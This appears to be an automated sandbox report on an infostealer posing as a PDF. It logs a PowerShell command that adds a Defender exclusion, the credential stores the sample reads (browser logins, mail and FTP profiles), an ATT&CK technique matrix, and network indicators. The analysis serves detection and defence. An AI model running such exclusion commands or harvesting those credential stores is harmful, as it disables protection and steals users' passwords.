Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory written: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
Source: Yara match; File source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  24
                  System Information Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  111
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets141
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                  Virtualization/Sandbox Evasion
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

Source | Detection | Scanner | Label
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | 55% | ReversingLabs | Win32.Spyware.Negasteal
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
beirutrest.com | 50.87.144.157 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp; CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp; CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://tempuri.org/ianiDataSet1.xsd | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | false | | high
https://account.dyn.com/ | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp; CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://api.ipify.org/t | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp; CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://beirutrest.com | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ianiDataSet2.xsdM | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | false | | high
http://tempuri.org/ianiDataSet.xsd | CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | false | | high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
50.87.144.157 | beirutrest.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1560091
                                        Start date and time:2024-11-21 11:50:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 51s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 95
                                        • Number of non-executed functions: 9
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
Time | Type | Description
05:51:02 | API Interceptor | 10204700x Sleep call for process: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe modified
05:51:04 | API Interceptor | 10x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
104.26.12.205 | perfcc.elf | malicious | Xmrig | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
50.87.144.157 | PEACE SHIP PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | ZHENGHE 3_Q88 20241118.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | 01. MT JS JIANGYIN Ship Particulars.xlsx.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | ESTEEM ASTRO PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | Q88.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | TROODOS AIR PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | EVER ABILITY V66 PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | MV. NORDRHONE VSL's PARTICULARS.xlsx.exe | malicious | AgentTesla, PureLog Stealer |
50.87.144.157 | MUM - VESSEL'S PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
beirutrest.com | PEACE SHIP PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | ZHENGHE 3_Q88 20241118.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | 01. MT JS JIANGYIN Ship Particulars.xlsx.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | ESTEEM ASTRO PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | Q88.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | TROODOS AIR PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | EVER ABILITY V66 PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | MV. NORDRHONE VSL's PARTICULARS.xlsx.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
beirutrest.com | MUM - VESSEL'S PARTICULARS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 50.87.144.157
api.ipify.org | +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg | malicious | HtmlDropper | 104.26.12.205
api.ipify.org | DATASHEET.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | datasheet.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | datasheet.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.12.205
api.ipify.org | https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html | malicious | Gabagool | 104.26.12.205
api.ipify.org | https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com | malicious | Unknown | 104.26.12.205
api.ipify.org | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.74.152
api.ipify.org | order and drawings_pdf.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | vessel details_pdf.exe | malicious | AgentTesla | 104.26.12.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | wE1inOhJA5.msi | malicious | Remcos, RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | New_Order_PO-NG57283H9.exe | malicious | MassLogger RAT | 188.114.96.3
CLOUDFLARENETUS | https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zip | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | http://newvideozones.click | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
